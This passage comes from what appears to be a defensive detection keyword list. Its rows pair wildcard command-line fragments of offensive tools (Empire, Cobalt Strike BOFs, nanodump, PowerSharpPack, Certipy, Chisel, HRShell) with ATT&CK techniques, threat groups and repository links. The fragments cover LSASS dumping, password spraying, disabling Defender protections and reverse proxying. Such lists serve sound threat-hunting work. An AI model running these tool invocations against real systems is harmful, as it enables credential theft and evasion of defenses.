Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,0,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -* -ScheduledTask -OnIdle *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -* scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -* --script dns-srv-enum *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script http-ntlm-info *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script smb-enum-shares *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script smb-security-mode*smb-enum-shares *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --script smb-vuln-*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* --script=http-ntlm-info --script-args=http-ntlm-info.root=*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,0,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -* --script=ldap-search -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script=realvnc-auth-bypass *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script=robots -z list*robots.txt*http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* --script-args dns-srv-enum.domain=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -ScriptString * -GetMinimallyObfuscated*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* -ScriptString * -PSAmsiScanner *,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* -seatbelt -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --seclogon-duplicate*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* SeriousSam.Execute *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -* --server * --type pass-pols*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* server -p 80 --reverse --socks5*,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation 
tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* server.py -s tornado --cert /*pem --key /*.pem*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -* -ServerUri * -FindAmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* service -dump all-services.json*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* --service fortynorth*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -ServiceName * -PipeName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* servicetags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --session=allrules --wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --set-as-owned smart -bp * kerberos * --kdc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* Set-MpPreference -DisableIOAVProtection *,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* SetMzLogonPwd *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* set-objectowner * -target-sid * -owner-sid *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* setoolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -* -sgn -syscalls *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -sgn -unhook -antidebug *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* shadow auto -u * -p * -account *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -* -SharpChromium *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpDPAPI -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege 
Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -* -SharPersist *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,0,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -* -SharpShares *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpSniper *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpSocks *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -SharpSpray *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpUp -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -Sharpview *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -sharpweb -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --shell tcsh exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --shellcode *,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -* --shellcode *--dc-ip *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --shellcode *--silent*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --shellcode --remoteinject*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* shodan-api.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --show passwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --show_invalid_creds*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --shtinkering*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* sigflip.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.c *,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
